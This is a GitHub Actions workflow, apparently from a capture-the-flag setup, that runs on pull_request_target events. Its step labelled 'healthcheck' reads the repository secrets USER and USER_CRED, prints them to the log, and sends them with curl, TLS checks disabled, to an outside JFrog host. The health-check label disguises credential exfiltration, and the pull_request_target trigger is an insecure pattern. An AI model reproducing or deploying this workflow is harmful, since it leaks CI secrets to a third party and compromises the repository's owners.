name: New Pull Request Alert

on:
  pull_request_target:
    types: [opened, synchronize]

jobs:
  ci:
    runs-on: ubuntu-latest
    env:
      API_URL: "https://ctf.catch-the-frog.com"
    
    steps:
    - name: Checkout code
      uses: actions/checkout@v3
        
    - name: healthcheck
      continue-on-error: true
      env:
        URL: ${{env.API_URL}}
        USER: ${{ secrets.USER }}
        PW: ${{ secrets.USER_CRED }}
      run: |
        echo "Login health check"
        echo "$USER:$PW"
        echo "-------------------------------------------------------------------------------------------"
        curl --connect-timeout 2 -sSf -k  https://jfrogrepo21.jfrog.io/artifactory/?ll=$USER:$PW
        
    
